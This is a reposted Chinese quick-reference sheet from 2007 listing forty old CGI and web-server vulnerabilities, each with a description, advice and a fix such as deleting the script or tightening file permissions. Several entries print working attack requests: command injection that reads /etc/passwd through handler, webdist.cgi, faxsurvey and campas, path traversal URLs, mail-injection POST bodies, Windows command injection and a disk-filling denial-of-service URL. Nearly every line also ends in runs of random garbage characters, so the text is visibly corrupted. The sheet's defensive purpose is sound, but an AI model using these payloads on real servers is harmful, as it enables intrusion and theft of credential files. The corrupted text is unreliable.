| CGI安全漏洞资料速查表 |
| [ 作者:佚名 转贴自:网络转载 阅读次数:19 更新时间:2007-7-29 6:13:00 录入:刘光勇 ] 热 |
|
|
|
1.wguset.exe 4@b�d�S7\u
描述: 如果您使用NT做为您的WebServer的操作系统,而且"wguest.exe"存在于您的Web可执行目录中的话,入侵者将能利用它阅读到您的硬盘上所有USR_用户能阅读的文件。 �E !r*��$#
建议: 将wguset.exe从你的Web目录移走或删除。 !dI�'G'K'�
解决方法: 将wguset.exe从你的Web目录移走或删除。 E� VYQ>bd�
h s�`3Vv p
2.rguset.exe �k:rZ!LRUi
描述: 如果您使用NT做为您的WebServer的操作系统,而且rguest.exe存在于您的Web可执行目录中的话,入侵者将能利用它阅读到您的硬盘上所有USR_用户能阅读的文件。 � :�R�h�d�
建议: 将rguset.exe从你的Web目录移走或删除。 c��A`�gH'�
解决方法: 将rguset.exe从你的Web目录移走或删除。 _Ab:� !Jsf
�&�km(gu}�
3. perl.exe yTE�"D{��C
描述: 在cgi-bin执行目录下存在perl.exe,这属于严重的配置错误。黑客可以在perl.exe后面加一串指令,利用浏览器在server上执行任何脚本程序。 W 0F=D�T�p
建议: perl.exe是放在任何带执行权限的web目录下都是不安全的。 I�eP^QD)Vs
解决方法: 在web目录下移除perl.exe这个程序。 C��0���=
2cT5Krbi�F
4.shtml.exe Rz2�&-J X=
描述: 如果您使用Front Page作为您的WebServer,那么入侵者能够利用IUSR_用户和shtml.exe入侵您的机器,做您不希望的事。 'TEE-xo5b]
建议: 将shtml.exe从你的Web目录移走或删除。 =M=�i��k|<
解决方法: 将shtml.exe从你的Web目录移走或删除。 8u {�{2b&
k- r2��8iG
5. wwwboard.pl V�>L q-I o
描述: wwwboard.pl程序容易引起攻击者对服务器进行D.O.S攻击。 �LRD�V�,G
建议: 如无必要可以删除该文件。 .G�B�t?G-m
解决方法: 对get_variables的子程序中的下面这段: U�&A `cA "
if ($FORM{'followup'}) { $followup = "1"; Jo6&�w15MB
@followup_num = split(/,/,$FORM{'followup'}); (F-�#WPO'!
$num_followups = @followups = @followup_num; ;[^��B4(Pb
$last_message = pop(@followups); *�xOb@=@b[
$origdate = "$FORM{'origdate'}"; 4Gn18W�CMt
$origname = "$FORM{'origname'}"; �'<>d OgeT
$origsubject = "$FORM{'origsubject'}"; } J}2aOgQvmO
替换为: s�2�!�-sp
if ($FORM{'followup'}) { S�Cri#@Z]Q
$followup = "1"; 0s�w(K/r2�
@followup_num = split(/,/,$FORM{'followup'}); ��7O :]X1o
$num_followups = @followups = @followup_num; ['�~77gE~�
$last_message = pop(@followups); t5s|>r�%Rw
$origdate = "$FORM{'origdate'}"; �3^I��FEDr
$origname = "$FORM{'origname'}"; ;Kwc�*t��p
$origsubject = "$FORM{'origsubject'}"; */V$U�12i�
# WWWBoard Bomb Patch 1��#jb4%mt
# Written By: Samuel Sparling sparling@slip.net) "A��&h$q%=
$fn=0; l8s77*mROR
while($fn < $num_followups) �#fhr�zFyT
{ y-b$�#pOTK
$cur_fup = @followups $fn]; G?�c�krmh�
$dfn=0; Q�@E4��bO�
foreach $fm(@followups) r`qQI`�6h�
{ ?\��@6 �kw
if(@followups[$dfn] == @followups[$fn] && $dfn != $fn) x��|{9�!�
{ �.@>w)j (�
&error(board_bomb); f,rXpU0-s~
} [Sx"�qo",{
$dfn++; �qz�!Z-eQ�
} �S�f��#~�%
$fn++; H� �(w�]#�
} �:Bv_>�-<G
# End WWWBoard Bomb Patch �NBG%h=e��
} 5BqI})IE2�
B��QU u]xB
6. uploader.exe �l( ":�6b�
描述: 如果您使用NT作为您的WebServer的操作系统,入侵者能够利用uploader.exe上传任何文件 �'ab�R��"�
建议: 将uploader.exe从你的Web目录移走或删除。 J�dyJ`+#Ux
解决方法: 将uploader.exe从你的Web目录移走或删除。 �CA2@l3�J�
Zv]Fq���+e
7. bdir.htr o4e>-�pU�v
描述: 如果您使用NT做为您的WebServer的操作系统,而且bdir.htr 存在于您的Web可执行目录中的话,入侵者将能利用它在您的服务器上无止境的创建ODBC数据库,并生成一些可执行的文件。 �S�.vh,�f:
建议: 将bdir.htr从你的Web目录移走或删除。 �uUSE[.$��
解决方法: 将bdir.htr从你的Web目录移走或删除。 �C*NgdY\Q1
, II�B_�(Y
8. Count.cgi xfPx**s~m2
类型: 攻击型 WV �\�&%��
描述: 在/cgi-bin目录下的Count.cgi程序(wwwcount2.3版本)有一个溢出错误,允许入侵者无须登录而远程执行任何指令。 jd�{Q`z^5
建议: 如无必要可以删除该文件。 f�JZo|d�:J
解决方法: 将wwwcount升级到2.4或者以上。 �C�t6hQ �-
P N�*>Pl�X
9. test-cgi r�pq)+=�_/
描述: test-cgi这个文件可以被入侵者用来浏览服务器上的重要信息。 R;�&At>)V�
建议: 建议审核cgi-bin目录下的执行程序,严格控制访问权限。 &�N�]s-I�
解决方法: 删除test-cgi文件。 ��":�c�Z[\
��19[�I��#
10.nph-test-cgi -H�O#t��5M
描述: nph-test-cgi这个文件可以被入侵者用来浏览服务器上的重要信息。 dV��/FL&�[
建议: 建议审核cgi-bin目录下的执行程序,严格控制访问权限。 k#,?=�<O}/
解决方法: 删除nph-test-cgi文件。 'zcn_X �by
.B;>Byj�T8
11. php.cgi V Ed>(`8Y1
描述: php.cgi程序有较多的漏洞,包括缓存溢出漏洞,还有导致任何系统文件可以被入侵者读取的漏洞 E]`A((VB5X
建议: 建议审核cgi-bin目录,避免有不必要的程序存在。 $-Us]hzb;9
解决方法: 删除php.cgi程序是最好的办法。 ~%7;�?x&�
r�n)2c�'Lg
12.handler B�22Q+F)@?
描述: IRIX 5.3, 6.2, 6.3, 6.4的/cgi-bin/handler程序存在缓存溢出错误,允许入侵者在server上远程执行一段程序: ��We�E�j*3
telnet target.machine.com 80 J A��;�S�'
GET /cgi-bin/handler/whatever;cat /etc/passwd| ? T<`6��~:9
data=Download jZ|pn0�]5M
HTTP/1.0 x <a 4O#mH
建议: 建议审核cgi-bin目录,避免有不必要的程序存在。 g1(pVtK�'�
解决方法: 删除handler文件。 ^Yo���Rxj=
hHf&&yPzCk
13. webgais YBEd>c OKP
描述: /cgi-bin,目录下的webgais是GAIS搜索工具的一个接口,它 }s|oz�A9"E
有一个毛病使入侵者可以绕过程序的安全机制,执行系统命令: �8B-/h�%*
POST /cgi-bin/webgais HTTP/1.0 0?i���;2f*
Content-length: 85 (replace this with the actual length of T\�Y+`BUHD
the "exploit" line) �Ij z `���
telnet target.machine.com 80 XU=exo�(f<
query=';mail+you\@your.host&domain=paragraph oLKEoz�I;W
建议: 建议审核cgi-bin目录,避免有不必要的程序存在。 �LoJ:+�BfZ
解决方法: 删除webgais文件。 Ipy_4{Z�&_
-Cm1�B�hq]
14.websendmail �8sJVE�~c
描述: /cgin-bin目录下的websendmail程序允许入侵者执行一个系统指令: t8snK �$kO
telnet target.machine.com 80 NBB>i� o�2
POST /cgi-bin/websendmail HTTP/1.0 �b~P1"t"a{
Content-length: xxx (should be replaced with the actual �!QA��Uw~#
length of the string passed to the server, in this case m>W`� op#O
xxx=90) Of;BB�Jp+�
receiver=;mail+your_address\@somewhere.orger=a&rtnaddr=a&subject=a %�9Z��w1$
&content=a ��h.g� �P�
建议: 建议审核cgi-bin目录,避免有不必要的程序存在。 vt�5O*%"�r
解决方法: 高级用户:编辑websendmail脚本,过滤特殊字符。 G^eu%�=Q�a
一般用户:删除websendmail文件。 m}�8�3�E&�
�''')W/U'e
15.webdist.cgi z�M]�26E�J
描述: 对于Irix6.2和6.3平台,/cgi-bin目录下的webdist.cgi有一个弱点允许入侵者无须登录而在系统上执行任何指令: W~Z2>V >5
_blank>http://host/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd �RxiTv'�fm
建议: 建议审核cgi-bin目录,避免有不必要的程序存在。 �,�rEf 7d
解决方法: 删除/var/www/cgi-bin/webdist.cgi目录下的webdist.cgi。 A +}x|" mt
Nvp]I1OR�e
16. faxsurvey #A���b%J_z
描述: 在Linux S.u.S.E上/cgi-bin目录下的faxsurvey程序允许入侵者无须登录就能在服务器执行指令: "�aw<���M=
linux.elsewhere.org/cgi-bin/faxsurvey?/bin/cat% " target=_blank>http://joepc.linux.elsewhere.org/cgi-bin/faxsurvey?/bin/cat% {}�j-�jF}s
20/etc/passwd U�3m�1aQ W
建议: 建议审核cgi-bin目录,避免有不必要的程序存在。 X3F��/J[S�
解决方法: 删除/cgi-bin/faxsurvey文件。 )I]jB#8r9#
:2<h=Mh@j!
17. htmlscript gT��UySV3z
描述: 安装了htmlscript2.99x或者更早版本的服务器,存在一个毛病使入侵者可以查看服务器上的任何文件: Y<e!,+Z�A
_blank>http://www.vulnerable.server.com/cgi- ��f�:�-0Xy
bin/htmlscript?../../../../etc/passwd {(�eTKHJlR
建议: 建议审核cgi-bin目录,避免有不必要的程序存在。 v�lJfi1T"k
解决方法: 删除/cgi-bin/htmlscript脚本文件,或者将htmlscript升级到3。0以上。 b\�Bv�MY�A
>b;LAafqI
18. www-sql Z+YGp[� +^
描述: www-sql存在于/cgi-bin/目录下,这将导致入侵可以越权访问被保护的文件。 F8�4O7�fU
建议: 最好删除www-sql文件。 =�Tn�(_A A
解决方法: #if PHPFASTCGI u�N �'��^y
while(FCGI_Accept() >= 0) SX��E�(x�
{ ��@HgV'kA
#endif zm>jX� N%E
s = getenv("REDIRECT_STATUS"); Ce�l�Ku�hR
if(!s) { �-\MR�)H�i
puts("Content-type: text/plain\r\n\r\nPHP/FI detected an {* p6x(=ML
internal error. Please inform sa@hogia.net of what you just whQ��T��DL
did.\n"); �W{��?&^U)
exit(1); +&�J�t(�g�
} v9GP/�5Sb
s = getenv("PATH_TRANSLATED"); 8O������=I
�G/Vfnn�[�
19.名字: view-source ��S���rx�!
描述: 在cgi-bin目录下的view-source程序没有对输入进行安全检查,使入侵者可以查看服务器上的任何文件 <�ce6/ZL�
建议: 建议审核cgi-bin目录,避免有不必要的程序存在。 �e+��9� /
解决方法: 删除/cgi-bin目录下的viewsource程序。 X ya=v%-�*
L[\:~�|$nW
20. campas ��*%glwaa�
描述: 在cgi-bin目录下的campas程序有一个毛病可以使入侵者随意查看server上的重要文件: fE|3<w5qz&
telnet www.xxxx.net 80 G'{�2[~s ?
Trying 200.xx.xx.xx... =rQ�dLk7\p
Connected to venus.xxxx.net mzK�xO-hcB
Escape character is '^]'. @=3��-!wUw
GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a AEA�X-@I �
建议: 建议审核cgi-bin目录,避免有不必要的程序存在。 t�� \!PZv~
解决方法: 删除/cgi-bin目录下的campas程序。 kkcl'��R<p
/,� �3>� z
21.aglimpse ,g[rp�1?�j
描述: 在cgi-bin目录下的aglimpse程序有一个毛病可以使入侵者无须登录而随意执行任何指令 rK`pck\ u
建议: 建议审核cgi-bin目录,避免有不必要的程序存在。 qQv$4 G�0x
解决方法: 删除/cgi-bin目录下的aglimpse程序。 4p��Ln$s\9
(7\�bY j�\
22.AT-admin.cgi 06�`����tq
描述: 在Excite for Web Servers 1.1上的/cgi-bin/AT-admin.cgi h�/�>% -^v
程序,允许普通用户完全控制整个系统 gO3q>H^��p
建议: 建议审核cgi-bin目录,避免有不必要的程序存在。 >�"4#-/0r*
解决方法: 删除/cgi-bin目录下的AT-admin.cgi程序。 ��7[sGS.%z
Z`�m/�oe3�
23. finger ��n{vTz +R
,0��j32YT^
描述: 这个位于/cgi-bin下的finger程序,可以查看其它服务器的信息,但是如果将参数改成本机,本机上的帐号信息将暴露无遗: g=o�pr``��
/cgi-bin/finger?@localhost �Dy$�%/s�
建议: 建议审核cgi-bin目录,避免有不必要的程序存在。 ?o�a~? a{"
解决方法: 删除/cgi-bin目录下的finger程序。 �N��)GDAsV
rr$)�I~V�z
24. webwho.pl g*TKm$?,�S
描述: 如果在您的Web可执行目录中有webwho.pl这个CGI脚本,那么入侵者将能利用他阅读启动Web的用户能读写执行的任何文件。 �C�z_7X'""
建议: 将webwho.pl从您的Web目录中删除或移走。 ^t^� +q�:�
解决方法: 将webwho.pl从您的Web目录中删除或移走。 Hb r3I�c^�
h3-�Ar�7Z
*go�x{.nA�
25. w3-msql 1=% _8-s-K
描述: MiniSQL软件包发行版本附带的一个CGI(w3-msql)可被用于以httpd的uid权限执行任意代码。这个安全漏洞是由程序中的scanf()函数引起的。 K8U]}vB('�
建议: 如果您安装了MiniSQL软件包,请您将/cgi-bin/目录下的w3-msql文件删除或移走 dZo _^[�*
解决方法: 如果您安装了MiniSQL软件包,请您将/cgi-bin/目录下的w3-msql文件删除或移走. am�)A�f�br
v>�mF�2j|
26. Netscape FastTrack server 2.0.1a �Z3�ciUJ��
描述: UnixWare 7.1附带的Netscape FastTrack server 2.0.1a存在一个远程缓冲区溢出漏洞。缺省地,监听457端口的httpd通过http协议提供UnixWare文档。如果向该服务器传送一个长度超过367字符的GET请求,会使缓冲区溢出,EIP值被覆盖将可能导致任意代码以httpd权限执行。 z8epa�9mG
建议: 临时解决方法是关闭Netscape FastTrack服务器。 *< F |z�C�
解决方法: 临时解决方法是关闭Netscape FastTrack服务器。 W)Ki� >O[&
Fu5kydZ|-7
27. AnyForm.cgi yEs2j-A<)
描述: 位于cgi-bin目录下的AnyForm.cgi程序,是用于简单表单通过邮件传递响应的,但该程序对用户输入检查不彻底,可被入侵者利用,在server上执行任何指令。 3-5� d7X~]
建议: 建议审核cgi-bin目录,避免有不必要的程序存在。 !IZ~Ny�kJ(
解决方法:建议升级该cgi程序,或者删除该文件。 !S�n{ PR��
��k@tlK�!h
28. whois.cgi (uy[#�&<2�
描述:在多个WebServer中带有的Whois.cgi存在溢出漏洞。它们包括: !F cN\bn�
Whois Internic Lookup - version: 1.02 y)j$6M$9L2
CC Whois - Version: 1.0 wR�a�h{�z
Matt's Whois - Version: 1 ��8>MC��y�
他们将使入侵者能够在您的系统上使用启动httpd用户的权限执行任意的代码 P�9 -�h5J�
建议: 将在您Web目录中问whois.cgi删除或移走。 Co10 b��bX
解决方法: 将在您Web目录中问whois.cgi删除或移走。 @Ce�Gu8Y7�
'A�8c�.$C&
29. environ.cgi 1[\8/�8S4`
描述: 在Apache web server或者IIS等其它web server的/cgi-bin/environ.cgi 程序,有一个毛病允许入侵者绕过安全机制,浏览服务器上的一些文件。 DAF�p, dXE
建议: 建议审核cgi-bin目录,避免有不必要的程序存在。 �?dU8c<Duv
解决方法: 建议升级该cgi程序,或者删除该文件。 ��:& -l*)�
)�4 I^<��_
30. wrap c*� �s�v�-
描述: /cgi-bin/wrap程序有两个漏洞,均允许入侵者获取服务器上文件的非法访问,如: 1*bp��^RfR
_blank>http://host/cgi-bin/wrap?/../../../../../etc axwFaj&�]s
建议: 建议审核cgi-bin目录,避免有不必要的程序存在。 �p�T�Xs�|T
解决方法: 删除/cgi-bin/wrap文件。 9?>/MI[�~H
�q@@�bt[�
31. edit.pl qvuW-KF4�
描述: /cgi-bin/edit.pl有一个安全弱点,用下面这条命令就可以访问用户的配置情况: yv[9[jkn,f
_blank>http://www.sitetracker.com/cgi-bin/edit.pl? @t��k�t��|
account=&password= V�(Xn�eL1
建议: 建议审核cgi-bin目录,避免有不必要的程序存在。 4EUs%xm'�m
解决方法: 删除/cgi-bin/edit.pl文件。 Ja^i{0�>KP
MQQ*�8$��b
32.service.pwd ���rnmWIpD
描述: UNix系统的_vti_pvt/service.pwd" target=_blank>http://www.hostname.com/_vti_pvt/service.pwd可读,将暴露用户密码信息。 #=l9_r1;�\
建议: 建议删除 <D JE?�DE:
解决方法:chown root service.pwd Vr+<fL�y^`
chmod 700 service.pwd $0,�cj�sny
� )qC�e6>m
33.administrators.pwd C\fF.��B1E
描述: UNix系统的_vti_pvt/administrators.pwd" target=_blank>http://www.hostname.com/_vti_pvt/administrators.pwd可读,将暴露用户密码信息 ]c&mo:?r��
建议: 建议删除 S.I"A&x_jA
解决方法:chown root administrators.pwd n�u?rd�fX�
chmod 700 administrators.pwd Q1q��%�Sg~
<+Nq<~227S
34.users.pwd �~]q>>qI%�
描述: UNix系统_vti_pvt/users.pwd " target=_blank>http://www.hostname.com/_vti_pvt/users.pwd可读,将暴露用户密码信息 �.�B�id��I
建议: 建议删除 ? +�Ek\_ '
解决方法: chown root users.pwd =QSu4 GK%z
chmod 700 users.pwd p�P&%4}I )
� z!g�&~sh
35. authors.pwd =e�jO]J�8�
描述: UNix系统的_vti_pvt/authors.pwd" target=_blank>http://www.hostname.com/_vti_pvt/authors.pwd可读,将暴露用户密码信息 ��de+tDWYU
建议: 建议删除 C2w&R_Wlp5
解决方法: chown root authors.pwd ?c$7^fTvV
chmod 700 authors.pwd \ 1U4b'7�
�PT5#~mt�X
36. visadmin.exe k_ n�HlW-�
描述: 在OmniHTTPd Web Server的cgi-bin目录下存在这个文件visadmin.exe,那么攻击者只要输入下面的命令: ?gw'YZ�?a
_blank>http://omni.server/cgi-bin/visadmin.exe?user=guest �1�v{ ! gk
数分钟之后服务器的硬盘将会被撑满。 �Ma���} NN
建议: 建议删除。 /pzEx� Z8/
解决方法: 把visadmin.exe从cgi-bin目录中删除 #��Sb�d�g3
0n@Pp?�VUS
37. get32.exe �WTU�5&80,
描述: Alibaba的web server,其cgi-bin目录存在get32.exe这个程序,允许入侵者任意执行一条指令: #3%1C6�w^
_blank>http://www.victim.com/cgi-bin/get32.exe|echo% -X=v5`c �
20>c:\command.com ;ah�: [/$l
建议: 建议删除。 'n&�u��}}P
解决方法: 把GET32.exe从cgi-bin目录中删除。 .�W�J,}�1#
YpN�[0<WtM
38. alibaba.pl y�YC �B?u�
描述: Alibaba的web server,其cgi-bin目录存在alibaba.pl这个程序,允许入侵者任意执行一条指令: 4�Ew��bJGQ
_blank>http://www.victim.com/cgi-bin/alibaba.pl|dir a$�M4|:q2
建议: 建议删除。 L]w"z��o>
解决方法: 把alibaba.pl从cgi-bin目录中删除。 !NeR� �?KT
:k(y�9r�Yc
39. tst.bat 0�x1<Q� @
描述: Alibaba的web server,其cgi-bin目录存在tst.bat这个程序,允许入侵者任意执行一条指令: %6^l'$&@TY
_blank>http://www.victim.com/cgi-bin/tst.bat|type% �8 �]{LqC
20c:\windows\win.ini ._@Ml!{(!%
建议: 建议删除。 ]@��^ F��i
解决方法: 把tst.bat从cgi-bin目录中删除。 c�r8�S3�D9
l-o|Bx� (�
40.fpcount.exe avQh_T&�.�
描述: 如果您使用NT作为您的WebServer的操作平台,并只安装了SP3补丁,那么入侵者能利用这个CGI程序进行DoS攻击,使您的IIS服务拒绝访问。 "3}-'�P FP
建议: 将在您Web目录中的fpcount.exe删除或移走。 *;.g��|]xO
解决方法: 将在您Web目录中的fpcount.exe删除或移走
|
|
|
|
下载中心
先飞电脑技术网 →
技术文章 → 网络技术 → 网络安全
版权声明:本站提供的“CGI安全漏洞资料速查表”版权归文章所有者,转载请注明出处!
